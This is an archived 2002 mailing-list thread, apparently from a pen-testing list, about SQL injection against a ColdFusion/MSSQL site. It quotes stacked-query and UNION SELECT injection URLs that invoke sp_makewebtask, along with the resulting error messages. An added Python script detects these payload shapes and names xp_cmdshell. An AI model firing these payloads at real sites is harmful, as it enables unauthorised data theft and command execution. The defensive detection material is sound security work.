Re: SQL INJECTION IN Coldfusion

From: Cesar (cesarc56at_private)
Date: Fri Sep 13 2002 - 19:04:37 PDT

    Hi.
    You must use UNION ALL to get all the rows.
    
    For new techniques take a look at this paper:
    
    Manipulating MS Sql Server using sql injection.
    http://www.appsecinc.com/news/briefing.html#inject
    
    Cesar.
    
    --- Mr Ro <vnmrroat_private> wrote:
    > hello pen-tester,
    > I am dealing with a pen-test against a CFM server with
    > MSSQL as backend. It is vulnerable to direct SQL injection.
    > I figure out that I can create, drop... table, execute
    > xp_cmdshell, sp_makewebtask, so I submit:
    > http://mysite/file.cfm?id=4546;exec sp_makewebtask "C:\winnt\temp\blah.htm","select * from master..sysmessages"--
    > it's okay, and I want to get "C:\winnt\temp\blah.htm".
    > I submit:
    > http://mysite/file.cfm?id=4567;create table blah (line varchar(8000))--
    > and then, I submit:
    > http://mysite/file.cfm?id=4567 UNION SELECT line from mrro--
    > it returns an error complaining that "All queries in an
    > SQL statement containing a UNION operator must have an
    > equal number of expressions in their target lists." so
    > I keep adding "line" in my request url
    > (http://mysite/file.cfm?id=4567 UNION SELECT line,line,line from mrro--),
    > finally it returns an error message like this:
    > "[Microsoft][ODBC SQL Server Driver][SQL Server]The
    > text, ntext, or image data type cannot be selected as DISTINCT."
    > question here: who can explain to me what happened?
    > 
    > I know there is another way to download or upload
    > files using "tftp", so is there any free "tftp" server
    > for me to use instead of installing a new one?
    > thanks for reading.
    > best regards
    > mrro
    



    This archive was generated by hypermail 2b30 : Mon Sep 16 2002 - 21:46:55 PDT
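
A defender's view of the request shapes quoted in this thread, as an added example that is not part of the original messages: a small Python check that flags web-log URLs where a numeric parameter carries a stacked statement, a UNION SELECT, or one of the procedures named above. The parameter name `id`, the rule names and the sample URLs are assumptions constructed from the thread's requests.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Rule names are hypothetical; patterns mirror the request shapes quoted in the thread.
RULES = {
    "stacked-statement": re.compile(
        r";\s*(exec|execute|create|drop|alter|insert|update|delete)\b", re.I),
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "extended-proc": re.compile(r"\b(xp_cmdshell|sp_makewebtask)\b", re.I),
    "trailing-comment": re.compile(r"--\s*$"),
}
NUMERIC_PARAMS = {"id"}  # assumption: parameters the application expects to be integers


def inspect_url(url):
    """Return the sorted rule names that fire on one logged request URL."""
    findings = set()
    # Split on '&' only, so a ';' inside a value is kept and inspected.
    for pair in urlsplit(url).query.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)  # decode %XX and '+' before matching
        if name.lower() in NUMERIC_PARAMS and not re.fullmatch(r"\d+", value):
            findings.add("non-numeric-id")
        for rule, pattern in RULES.items():
            if pattern.search(value):
                findings.add(rule)
    return sorted(findings)


def scan(urls):
    """Map each flagged URL to its findings; clean requests are omitted."""
    results = {u: inspect_url(u) for u in urls}
    return {u: f for u, f in results.items() if f}


# Constructed sample requests (not real log data), modelled on the thread.
SAMPLE_REQUESTS = [
    "http://mysite/file.cfm?id=4546",
    "http://mysite/file.cfm?id=4546%3Bexec%20sp_makewebtask%20"
    "%22C%3A%5Ctemp%5Cout.htm%22%2C%22select%201%22--",
    "http://mysite/file.cfm?id=4567+UNION+SELECT+line+from+blah--",
    "http://mysite/file.cfm?id=4567;create table blah (line varchar(8000))--",
]

if __name__ == "__main__":
    for url, findings in scan(SAMPLE_REQUESTS).items():
        print(", ".join(findings), "<-", url)
```

The `non-numeric-id` rule is the one that generalizes: the same integer-only check, enforced in the application before the value reaches the query, rejects every request shape shown in the thread.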